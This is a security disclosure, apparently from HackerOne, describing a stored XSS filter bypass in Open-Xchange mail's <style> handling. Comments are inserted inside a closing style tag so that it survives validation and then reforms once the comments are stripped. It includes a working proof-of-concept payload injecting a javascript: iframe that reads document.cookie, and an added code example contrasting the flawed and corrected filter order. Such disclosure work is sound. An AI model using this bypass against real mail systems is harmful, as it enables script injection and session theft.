Open-Xchange: [XSS] Mail <style> v2.0

2017-12-19T20:23:36
ID H1:299466
Type hackerone
Reporter secator
Modified 2020-01-24T11:48:47

Description

Hi.

New way for #269116. Testing rev17.

OX checks data before removing /* */, therefore a filter bypass:

```html
<style>
.a {
  font-family: </styl/**/e>;
  font-family: </sty/**/le>;
  font-family: </s/*data*/tyle>;
}
</style>
```

For example:

```json
"content": "<style>.a { font-family: </st/**/yle><iframe src=javascript:alert(document.cookie)>}</style>",
```

Result:

```html
<style>
ox-c3a5f76596 .ox-c3a5f76596-a {font-family: </style>
<iframe src=javascript:alert(document.cookie)>
```

Impact

malicious code injection
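
The ordering flaw described in this report (the check runs before `/* */` comments are removed), shown beside a corrected order. This is an added example, not part of the original report and not Open-Xchange code; the function names and regular expressions are hypothetical.

```javascript
// Hypothetical model of a mail <style> filter. Names and regexes are
// assumptions made for illustration; this is not Open-Xchange code.
const CSS_COMMENT = /\/\*[\s\S]*?\*\//g;
const STYLE_CLOSE = /<\/style/i; // text that would end the <style> element

// Flawed order from the report: validate first, strip comments afterwards.
function filterCheckThenStrip(css) {
  if (STYLE_CLOSE.test(css)) return null;   // "</st/**/yle>" does not match here
  return css.replace(CSS_COMMENT, '');      // ...but stripping turns it into "</style>"
}

// Remove comments until the string stops changing, because removing one
// comment can join the pieces of another ("//**/*x*/" -> "/*x*/" -> "").
function stripCommentsFully(css) {
  let prev;
  let out = css;
  do {
    prev = out;
    out = out.replace(CSS_COMMENT, '');
  } while (out !== prev);
  return out;
}

// Corrected order: normalise completely, then validate the exact string
// that will be written into the page.
function filterStripThenCheck(css) {
  const out = stripCommentsFully(css);
  return STYLE_CLOSE.test(out) ? null : out;
}

// Payload taken from the report's "content" example (inner CSS only).
const REPORTED_CSS =
  '.a { font-family: </st/**/yle><iframe src=javascript:alert(document.cookie)>}';

function demo() {
  return {
    flawed: filterCheckThenStrip(REPORTED_CSS),   // contains "</style><iframe ..."
    fixed: filterStripThenCheck(REPORTED_CSS),    // null (rejected)
    benign: filterStripThenCheck('.a { color: red; /* note */ }'),
  };
}
```

The validation step has to run on the final, fully normalised output; any transformation applied after the check can reintroduce what the check was meant to block.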